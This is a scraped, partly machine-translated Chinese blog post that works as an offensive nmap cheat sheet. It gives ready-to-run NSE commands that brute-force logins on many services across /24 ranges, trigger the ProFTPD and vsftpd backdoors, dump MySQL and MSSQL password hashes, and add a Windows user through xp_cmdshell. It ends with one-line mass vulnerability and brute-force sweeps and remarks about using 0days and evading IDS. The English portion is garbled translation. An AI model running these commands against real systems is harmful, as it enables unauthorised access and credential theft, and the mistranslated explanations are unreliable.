Advanced use nmap [script article]

Others 2019-07-29 00:15:25 views: null

 

 

Advanced use nmap [script article]

2017-05-18 NMAP



0x01 Foreword

Because today's focus is not itself use nmap, this time mainly wanted to give you some more practical in the real opposite of nmap script, so its options with regard to some of the nmap role not say any more details, please refer to penetrate the port-related blog article, without further ado, we just start, we can first practice with the following statement, probably glance at the target machine or objective C segment ran what services my heart to have a spectrum, we go after the targeted cards Well :

1
# nmap -sV -sT -Pn --open -v 192.168.3.23

 

Of course, you can also try to get the next target machine for each service banner more detailed information, as some service tools vulnerability only affects a specific version, so, know in advance what is still very necessary:

1
# nmap -sT -Pn --open -v banner.nse 192.168.3.23

 

0x02 and ftp some related vulnerability detection script:

1
2
anon-ftp .nse check the target ftp whether to allow anonymous login, login is not enough light, it will automatically detect whether the directory can read and write, such as batch ftp catch chicken
# nmap -p 21 --script ftp-anon.nse -v 192.168.3.23

 

1
2
Brute-the FTP .nse the FTP blasting script [only try some simpler weak passwords, time may be slightly longer (after hanging vpn this burst speed may be slower), after all, is a direct blast at the public network]
# nmap -p 21 --script ftp-brute.nse -v 192.168.3.23
1
2
vuln-cve2010-4221-FTP .nse . 1 the ProFTPD .3 before .3 C netio .c file exists in the plurality of stack overflow function pr_netio_telnet_gets
# nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23
1
2
the ProFTPD ProFTPD-backdoor.nse-FTP 1.3 .3 C was inserted back door [ProFTPD -1.3 .3c.tar.bz2], only the default execution id command, the command script self it directly into the bomb shell
# nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23
1
2
the vsftpd-Backdoor-FTP .nse VSFTPD V2 .3 .4 with the same problem Proftp, was inserted back door
# nmap -p 21 --script ftp-vsftpd-backdoor.nse -v 192.168.3.23

0x03 and scan ssh related to some of the script:

1
2
SSHv1 .nse SSHv1 is an intermediary
# nmap -p 22 --script sshv1.nse -v 192.168.3.23

 

0x04 Some scanning scripts and smtp related to:

1
2
Brute-smtp .nse simple blasting smtp
# nmap -p 25 --script smtp-brute.nse -v 192.168.3.23

 

1
2
SMTP- enum- the Users. NSE enumerate target mail user name smtp server, provided that the target for this misconfiguration exists for the job
# nmap -p 25 --script smtp-enum-users.nse -v 192.168.3.23
1
2
vuln-cve2010-the SMTP -4344.nse Exim versions prior to 4.70 string.c file string_vformat function in a heap overflow
# nmap -p 25 --script smtp-vuln-cve2010-4344.nse -v 192.168.3.23
1
2
vuln-cve2011-1720-SMTP .nse the Postfix 2 .5 previous version .13, 2 .6 .10 before 2 .6 .x version, 2 .7 2 before .4 .7 .x and version 2 .8 . 2 before. 3 .8 .x version, there is an overflow
# nmap -p 25 --script smtp-vuln-cve2011-1720.nse -v 192.168.3.23
1
2
vuln-cve2011-the SMTP -1764.nse Exim "dkim_exim_verify_finish ()" format string vulnerability exists, too old basic hard encountered
# nmap -p 25 --script smtp-vuln-cve2011-1764.nse -v 192.168.3.23

0x05 Some scanning scripts and pop3 related to:

1
2
Brute-POP3 .nse POP simple weak passwords Blasting
# nmap -p 110 --script pop3-brute.nse -v 192.168.3.23

 

0x06 Some scanning scripts and related imap:

1
2
Brute-IMAP .nse IMAP simple weak passwords Blasting
# nmap -p 143,993 --script imap-brute.nse -v 192.168.3.23

 

0x07 Some vulnerability scan scripts and dns related to:

1
2
3
dns-zone-transfer.nse check target server is allowed to transmit ns
# nmap -p 53 --script dns-zone-transfer.nse -v 192.168.3.23
# nmap -p 53 --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=target.org -v 192.168.3.23

 

1
2
hostmap-ip2hosts next .nse station queries visually a little script, with ip2hosts interface, but this interface seems to have disabled, if you want to continue to use, free to the script to get rid of the interface part of the code
# nmap -p80 --script hostmap-ip2hosts.nse 192.168.3.23

0x08 和各种数据库相关的扫描脚本:

1
2
informix-brute.nse informix爆破脚本
# nmap -p 9088 --script informix-brute.nse 192.168.3.23

 

1
2
mysql-empty-password.nse mysql 扫描root空密码
# nmap -p 3306 --script mysql-empty-password.nse -v 192.168.3.23
1
2
mysql-brute.nse mysql root弱口令简单爆破
# nmap -p 3306 --script mysql-brute.nse -v 192.168.3.23
1
2
mysql-dump-hashes.nse 导出mysql中所有用户的hash
# nmap -p 3306 --script mysql-dump-hashes --script-args='username=root,password=root' 192.168.3.23
1
2
mysql-vuln-cve2012 -2122.nse Mysql身份认证漏洞[MariaDB and MySQL 5.1.61,5.2.11, 5.3.5, 5.5.22],利用条件有些苛刻 [需要目标的mysql是自己源码编译安装的,这样的成功率相对较高]
# nmap -p 3306 --script mysql-vuln-cve2012-2122.nse -v 192.168.3.23
1
2
# nmap -p 445 --script ms-sql-info.nse -v 203.124.11.0/24 ms-sql-info.nse 扫描C段mssql
# nmap -p 1433 --script ms-sql-info.nse --script-args mssql.instance-port=1433 -v 192.168.3.0/24
1
2
ms-sql-empty-password.nse 扫描mssql sa空密码
# nmap -p 1433 --script ms-sql-empty-password.nse -v 192.168.3.0/24
1
2
ms-sql-brute.nse sa弱口令爆破
# nmap -p 1433 --script ms-sql-brute.nse -v 192.168.3.0/24
1
2
ms-sql-xp-cmdshell.nse 利用xp_cmdshell,远程执行系统命令
# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user test test /add" 192.168.3.0/24
1
2
ms-sql-dump-hashes.nse 导出mssql中所有的数据库用户及密码hash
# nmap -p 1433 --script ms-sql-dump-hashes -v 192.168.3.0/24
1
2
pgsql-brute.nse 尝试爆破postgresql
# nmap -p 5432 --script pgsql-brute -v 192.168.3.0/24
1
2
oracle-brute-stealth.nse 尝试爆破oracle
# nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL -v 192.168.3.0/24
1
2
oracle-brute.nse
# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL -v 192.168.3.0/24
1
2
mongodb-brute.nse 尝试爆破mongdb
# nmap -p 27017 --script mongodb-brute 192.168.3.0/24
1
2
redis-brute.nse redis爆破
# nmap -p 6379 --script redis-brute.nse 192.168.3.0/24

0x09 和snmp相关的一些扫描脚本:

1
2
snmp-brute.nse 爆破C段的snmp
# nmap -sU --script snmp-brute --script-args snmp-brute.communitiesdb=user.txt 192.168.3.0/24

 

0x10 和telnet相关的一些扫描脚本:

1
2
telnet-brute.nse 简单爆破telnet
# nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s -v 192.168.3.0/24

 

0x11 和ldap服务相关的一些利用脚本:

1
2
ldap-brute.nse 简单爆破ldap
# nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' 192.168.3.0/24

 

0x12 和各类web中间件,web集成环境相关的一些利用脚本:

1
2
xmpp-brute.nse xmpp爆破
# nmap -p 5222 --script xmpp-brute.nse 192.168.3.0/24

 

1
2
http-iis-short-name-brute.nse 短文件扫描
# nmap -p80 --script http-iis-short-name-brute.nse 192.168.3.0/24
1
2
http-iis-webdav-vuln.nse iis 5.0 /6.0 webadv写
# nmap --script http-iis-webdav-vuln.nse -p80, 8080 192.168.3.0/24
1
2
http-shellshock.nse bash远程执行
# nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.3.0/24
1
2
http-svn-info.nse 探测目标svn
# nmap --script http-svn-info 192.168.3.0/24
1
2
3
http-drupal- enum.nse 其实对于这类的开源程序,我们根本没必要用nmap,因为搞多了,差不多一眼就能看出来
http-wordpress-brute.nse
# nmap -p80 -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.3.0/24
1
2
http-backup-finder.nse 扫描目标网站备份
# nmap -p80 --script=http-backup-finder 192.168.3.0/24
1
2
http-vuln-cve2015 -1635.nse iis6.0远程代码执行
# nmap -sV --script http-vuln-cve* --script-args uri='/anotheruri/' 192.168.3.0/24

0x13 跟vpn相关的一些利用脚本,暂时只看到一个pptp还好使:

1
2
pptp-version.nse 识别目标pptp版本
# nmap -p 1723 --script pptp-version.nse 192.168.3.0/24

 

0x14 smb漏洞检测脚本集::

1
2
3
4
5
smb-vuln-ms08 -067.nse
smb-vuln-ms10 -054.nse
smb-vuln-ms10 -061.nse
smb-vuln-ms17 -010.nse smb远程执行
# nmap -p445 --script smb-vuln-ms17 -010.nse 192.168.3.0/24

 

0x15 检测内网嗅探,实际测试中,貌似并没什么卵用,难道是我实验有误 :(:

1
2
sniffer-detect.nse
# nmap -sn -Pn --script sniffer-detect.nse 192.168.3.0/24

 

0x16 其它的一些辅助性脚本:

1
2
rsync-brute.nse 爆破目标的rsync
# nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.3.0/24

 

1
2
rlogin-brute.nse 爆破目标的rlogin
# nmap -p 513 --script rlogin-brute 192.168.3.0/24
1
2
vnc-brute.nse 爆破目标的vnc
# nmap --script vnc-brute -p 5900 192.168.3.0/24
1
2
pcanywhere-brute.nse 爆破pcanywhere
# nmap -p 5631 --script=pcanywhere-brute 192.168.3.0/24
1
2
nessus-brute.nse 爆破nessus,貌似现在已经不是 1241端口了,实在是太老了,直接忽略吧
# nmap --script nessus-brute -p 1241 192.168.3.0/24
1
2
nexpose-brute.nse 爆破nexpose
# nmap --script nexpose-brute -p 3780 192.168.3.0/24
1
2
shodan-api.nse 配合shodan接口进行扫描,如果自己手里有 0day,这个威力还是不可小觑的
# nmap --script shodan-api --script-args 'shodan-api.target= 192.168.3.0/24,shodan-api.apikey=SHODANAPIKEY'

0x17 尝试利用nmap一句话进行目标C段常规漏洞扫描

实际测试中,会非常的慢,可能跑一个脚本验证时间都要很长,尤其在你的vps带宽不是很足,网络又不怎么好的时候,速度就更慢了,所以还是建议先大致扫一眼目标服务,然后再单独针对性的扫,这样实际的成功率可能会高很多,毕竟,不是像masscan或者zamp这种基于无状态的扫描:

1
# nmap -sT -Pn -v --script dns-zone-transfer.nse,ftp-anon.nse,ftp-proftpd-backdoor.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010- 4221.nse,http-backup-finder.nse,http-cisco-anyconnect.nse,http-iis-short-name-brute.nse,http-put.nse,http-php-version.nse,http-shellshock.nse,http-robots.txt.nse,http-svn-enum.nse,http-webdav-scan.nse,iis-buffer-overflow.nse,iax2-version.nse,memcached-info.nse,mongodb-info.nse,msrpc-enum.nse,ms-sql-info.nse,mysql-info.nse,nrpe-enum.nse,pptp-version.nse,redis-info.nse,rpcinfo.nse,samba-vuln-cve-2012-1182.nse,smb-vuln-ms08-067.nse,smb-vuln-ms17-010.nse,snmp-info.nse,sshv1.nse,xmpp-info.nse,tftp-enum.nse,teamspeak2-version.nse 192.168.3.0/24

 

尝试利用nmap一句话进行目标C段弱口令爆破,还是上面的问题,验证一个漏洞都要那么久,更不要说跑完一个弱口令字典,nmap默认的弱口令字典大概是5000左右,也就是说一个用户名就要跑大概5000次,估计你vps带宽再小点儿的话,这个就没什么谱了,毕竟我们是在公网,不是在内网,所以,还是建议最好不要同时加载很多个弱口令爆破脚本,如果实在没办法必须爆破,可以多花点儿时间,去搜集目标有价值的用户名,以此尽可能提高自己的命中率:

1
# nmap -sT -v -Pn --script ftp-brute.nse,imap-brute.nse,smtp-brute.nse,pop3-brute.nse,mongodb-brute.nse,redis-brute.nse,ms-sql-brute.nse,rlogin-brute.nse,rsync-brute.nse,mysql-brute.nse,pgsql-brute.nse,oracle-sid-brute.nse,oracle-brute.nse,rtsp-url-brute.nse,snmp-brute.nse,svn-brute.nse,telnet-brute.nse,vnc-brute.nse,xmpp-brute.nse 192.168.3.0/24

 



后话:
    由于nmap内置丰富的漏洞扫描脚本,也使得nmap的能力在一定程度得到了极大的扩展,意味者我们完全可以自己按照nmap事先规定好的语法来模仿实现一些简单的定制扫描,这也是让我感觉nmap做的非常好的一点,极大的可扩展性,比如,你自己握有0day时,想自动化干点儿什么事儿,嘿嘿……具体就不多说了,相信大家都懂,^_^ [ 希望不要撞到别人的蜜罐中去就好了,不然Nday就可惜了 ],没错,masscan,zmap这种基于无状态的扫描确实快的吓人,而且shodan api也是个很不错的选择,但对定制脚本支持始终还是差了点,时间关系只挑了一些可能用到的脚本,今天就简单聊到这儿吧,工具没有没有好坏,虽然实战中不一定都能用上,关键还是大家在实际渗透过程中能灵活变通就好,话说回来,这一切的前提都是建立在别人让你扫的基础之上的,nmap的标志实在是太招摇过市了,nmap所支持的那几种扫描类型,估计早已被各种ids所免疫,说实话,有些目标可能都没什么机会让你扫,关于nmap其它的一些用法,后期遇到相对比较实用的会不定期再更新上来,大家如果有兴趣,也可以直接去参考官方,那里说的还是非常详细的,起码比我这个要详细很多,有任何问题请直接私信我
                 

 

Guess you like

Origin www.cnblogs.com/kuaile1314/p/11260344.html
Recommended
Ranking
Enter the root node and an integer of a binary tree, and print out all paths where the sum of the node values in the binary tree is the input integer. Pop explanation in.
HTTP, HTTPS, FTP und TCP im Detail erklärt: die Funktionen und Eigenschaften der Protokolle
[Study notes] Berlekamp-Massey
Some insights as a junior front-end developer
[linux command] echo command and usage tips
Verilig-- state machine
Knowing the center point coordinates, angle, half length, and half width of Retangle2, calculate the four vertex coordinates and the midpoint coordinates of the four line segments
【uniapp】Google Maps
Unity uses Camera to make a small map display, and players can reach any location by clicking the small map
algorithmic analysis
Daily
More
2024-07-22(0)
2024-07-21(0)
2024-07-20(0)
2024-07-19(0)
2024-07-18(0)
2024-07-17(0)
2024-07-16(0)
2024-07-15(0)
2024-07-14(0)
2024-07-13(0)

Code World

© 2018 codetd.com